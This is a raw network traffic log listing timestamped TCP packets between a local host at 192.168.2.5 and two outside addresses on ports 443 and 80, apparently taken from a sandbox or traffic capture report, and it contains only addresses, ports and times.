Jul 27, 2023 01:35:39.239067078 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.239118099 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.239131927 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.239157915 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.239186049 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.240139961 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.240163088 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.240233898 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.240247011 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.240279913 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.241408110 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.241431952 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.241501093 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.241514921 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.241913080 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.241955996 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.242005110 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.242014885 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.242038012 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.242064953 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.242192030 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.242247105 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.242284060 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.242295980 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.242316961 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.242345095 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.242624044 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.242651939 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.242711067 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.242726088 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.242747068 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.242779016 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.242818117 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.242834091 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.242847919 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.242877007 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.250552893 CEST	80	50314	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.252448082 CEST	50314	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.256860971 CEST	80	50315	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.257056952 CEST	50315	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.257492065 CEST	50315	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.275557995 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.275613070 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.275676012 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.275695086 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.275726080 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.275743008 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.280972004 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.281023026 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.281124115 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.281147957 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.281174898 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.281193972 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.281212091 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.281222105 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.281244993 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.281265974 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.281271935 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.281320095 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.281333923 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.281368017 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.281428099 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.281480074 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.281492949 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.281502962 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.281531096 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.281553030 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.302555084 CEST	80	50315	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.306767941 CEST	80	50315	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.307863951 CEST	50315	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.402956963 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.402997017 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.403083086 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.403101921 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.403147936 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.403332949 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.403362036 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.403403044 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.403418064 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.403450966 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.403460979 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.404118061 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.404145956 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.404231071 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.404253006 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.404287100 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.404309988 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.405514956 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.405550003 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.405601978 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.405623913 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.405648947 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.405749083 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.406553984 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.406588078 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.406662941 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.406682014 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.406713963 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.406739950 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.408571959 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.408611059 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.408659935 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.408675909 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.408710003 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.409038067 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.409040928 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.409060955 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.409091949 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.409106970 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.409121990 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.409156084 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.409178019 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.409421921 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.409457922 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.409502029 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.409517050 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.409564972 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.409564972 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.409800053 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.409831047 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.409874916 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.409888983 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.409918070 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.409948111 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.410201073 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.410228968 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.410278082 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.410290956 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.410326004 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.410378933 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.411530972 CEST	50315	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.412349939 CEST	50316	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.442076921 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.442112923 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.442187071 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.442207098 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.442240953 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.442265034 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.447348118 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.447381973 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.447493076 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.447514057 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.447535992 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.447570086 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.447571039 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.447588921 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.447617054 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.447659969 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.447901964 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.447923899 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.447978020 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.447990894 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.448016882 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.448051929 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.456837893 CEST	80	50315	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.456918955 CEST	50315	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.457897902 CEST	80	50316	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.460503101 CEST	50316	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.468558073 CEST	50316	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.513976097 CEST	80	50316	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.517376900 CEST	80	50316	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.517704964 CEST	50316	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.570467949 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.570508003 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.570578098 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.570591927 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:39.570636988 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:39.630213976 CEST	50316	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.631416082 CEST	50317	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.674679041 CEST	80	50316	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.675698042 CEST	80	50317	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.675834894 CEST	50316	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.675910950 CEST	50317	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.676832914 CEST	50317	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.721036911 CEST	80	50317	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.724936008 CEST	80	50317	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.725085974 CEST	50317	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.837605000 CEST	50317	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.838558912 CEST	50318	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.882100105 CEST	80	50317	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.882316113 CEST	50317	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.882910967 CEST	80	50318	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.886324883 CEST	50318	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.886812925 CEST	50318	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:39.931119919 CEST	80	50318	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.935158014 CEST	80	50318	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:39.937115908 CEST	50318	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.052083969 CEST	50318	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.052891016 CEST	50319	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.098356962 CEST	80	50318	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.098432064 CEST	80	50319	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.098529100 CEST	50318	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.098584890 CEST	50319	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.099277020 CEST	50319	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.145256996 CEST	80	50319	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.149987936 CEST	80	50319	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.152410984 CEST	50319	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.232664108 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.232685089 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.232760906 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.232860088 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.232889891 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.232917070 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.232922077 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.232958078 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.233006001 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.233097076 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.233125925 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.233170033 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.233179092 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.233202934 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.233381033 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.233417988 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.233458996 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.233468056 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.233514071 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.262520075 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.262562990 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.262665033 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.262748003 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.262761116 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.262788057 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.262836933 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.262876987 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.273184061 CEST	50319	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.274096966 CEST	50320	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.274971962 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.275003910 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.275096893 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.275113106 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.275157928 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.275192976 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.275216103 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.275254965 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.275264025 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.275294065 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.275330067 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.318836927 CEST	80	50319	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.319808006 CEST	80	50320	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.319957018 CEST	50319	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.320004940 CEST	50320	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.332328081 CEST	50320	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.377917051 CEST	80	50320	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.382110119 CEST	80	50320	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.384429932 CEST	50320	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.401041985 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.401072979 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.401201010 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.401233912 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.401271105 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.401324034 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.401360989 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.402168989 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.402190924 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.402277946 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.402304888 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.402327061 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.402403116 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.402437925 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.402478933 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.402497053 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.402523041 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.402646065 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.402705908 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.402719975 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.402735949 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.402765989 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.402834892 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.402859926 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.402904034 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.402919054 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.402944088 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.429995060 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.430026054 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.430219889 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.430265903 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.430346012 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.430389881 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.430425882 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.430439949 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.430455923 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.430586100 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.430612087 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.430644035 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.430655003 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.430670977 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.430778980 CEST	443	50304	108.181.20.35	192.168.2.5
Jul 27, 2023 01:35:40.430825949 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.434716940 CEST	50304	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:35:40.489721060 CEST	50320	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.490772963 CEST	50321	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.535382986 CEST	80	50320	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.535516024 CEST	50320	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.536021948 CEST	80	50321	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.536361933 CEST	50321	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.536820889 CEST	50321	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.582415104 CEST	80	50321	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.585664034 CEST	80	50321	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.585853100 CEST	50321	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.714256048 CEST	50321	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.715130091 CEST	50322	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.759809017 CEST	80	50321	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.760046005 CEST	50321	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.760771990 CEST	80	50322	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.760973930 CEST	50322	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.762923002 CEST	50322	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.808415890 CEST	80	50322	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.812285900 CEST	80	50322	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.812477112 CEST	50322	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.927311897 CEST	50322	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.927968979 CEST	50323	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.971446991 CEST	80	50322	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.971623898 CEST	50322	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.972496033 CEST	80	50323	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:40.972688913 CEST	50323	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:40.973367929 CEST	50323	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.021467924 CEST	80	50323	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.022013903 CEST	80	50323	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.022116899 CEST	50323	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.130913973 CEST	50323	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.133037090 CEST	50324	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.179199934 CEST	80	50323	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.179373980 CEST	50323	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.180895090 CEST	80	50324	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.181093931 CEST	50324	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.181687117 CEST	50324	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.225662947 CEST	80	50324	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.230159044 CEST	80	50324	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.230333090 CEST	50324	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.333234072 CEST	50324	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.334124088 CEST	50325	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.377780914 CEST	80	50324	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.377907038 CEST	50324	80	192.168.2.5	77.91.68.61
